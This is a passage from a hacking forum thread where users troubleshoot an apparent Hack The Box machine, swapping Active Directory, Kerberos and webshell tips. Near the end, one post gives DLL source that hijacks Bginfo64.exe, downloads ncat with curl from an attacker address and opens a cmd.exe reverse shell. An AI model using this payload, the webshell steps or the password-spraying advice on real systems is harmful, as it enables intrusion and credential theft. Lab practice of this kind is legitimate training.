Return to forum

Cipher · May 8, 2022 at 7:08 AM

(May 8, 2022, 05:41 AM)jon01 Wrote:
(May 7, 2022, 09:04 PM)Cipher Wrote: anyone can provide me dll.c

check previous post , there is everything availbale

its not working on me
netcat didnt lisson any port

orangutang · May 13, 2022 at 11:18 AM

Hi everybody. I cat get shell as BeatriceMill and as ginawild. How to get shell as bpassrunner ? Not works command

 Get-ADReplAccount -All -NamingContext 'DC=windcorp,DC=htb' -Server hathor

When i created ticket with hash c639e5b331b0e5034c33dec179dcc792 i got result: [-] Kerberos SessionError: KRB_AP_ERR_TKT_NYV(Ticket not yet valid)
I also synchronized the time. What is problem? Thanks advance.

buggy · May 17, 2022 at 10:24 AM

i cant simply rename it to aspx anything specific ?

Danet84 · May 26, 2022 at 10:49 AM

(April 19, 2022, 01:18 PM)Internetdreams Wrote: [email protected]:admin
edit the fragment1.htm on filemanager as a aspx webshell go copy it to /logos/fragment1.aspx. go to /Data/Sites/1/media/logos/fragment1.aspx

then look at getbADpasswords and fetch creds and spray

[quote pid="31310" dateline="1650374310"]

does not work, the adpx files are not loaded how to do? :dodgy:
[/quote]

Danet84 · May 26, 2022 at 12:23 PM

(May 26, 2022, 10:49 AM)Danet84 Wrote:
(April 19, 2022, 01:18 PM)Internetdreams Wrote: [email protected]:admin
edit the fragment1.htm on filemanager as a aspx webshell go copy it to /logos/fragment1.aspx. go to /Data/Sites/1/media/logos/fragment1.aspx

then look at getbADpasswords and fetch creds and spray

[quote pid="31310" dateline="1650374310"]

does not work, the adpx files are not loaded how to do? :dodgy:

And then the indicated patch Is not accessible error 404

[/quote]

Cipher · June 5, 2022 at 7:52 AM

Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.147.
Ncat: Connection from 10.10.11.147:57456.
GET /nc.exe HTTP/1.1
Host: 10.10.16.23:4444
User-Agent: curl/7.79.1
Accept: */*

But not inflect any shell??????????????????????????////

bothack · June 29, 2022 at 3:51 PM

Thanks All of You guyz. Pawn3d!!! :heart:

bothack · July 9, 2022 at 7:28 AM

(May 7, 2022, 09:17 AM)cavour12 Wrote: Anyone with this error like this?
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
i saw that is a problem with rhe sync time with server i tried ntpdate no luck

any suggestion will be great

I didn't know, but i had same issue. if you have dual boot. then first boot in the windows and then enable the time sync. there. then boot again in linux, the issue willl be resolved. this helped me.

yumi · July 26, 2022 at 12:50 PM

hello, can anyone help me with 7-zip.dll?I'm trying here I even tried your code and nothing.it doesn't even download ncat.exe# include BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){ switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: system("takeown /f C:\\share\\Bginfo64.exe"); system("icacls C:\\share\\Bginfo64.exe /grant Everyone:F /T"); system("curl x.x.x.x:8000/ncat.exe -o c:\\share\\Bginfo64.exe"); system("C:\\share\\Bginfo64.exe x.x.x.x 3333 -e cmd.exe"); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE;}

farkow · July 26, 2022 at 2:14 PM

Hmm could it be that machine is patched?
It is not possible to write to /c/sh.....re with Be...M... anymore.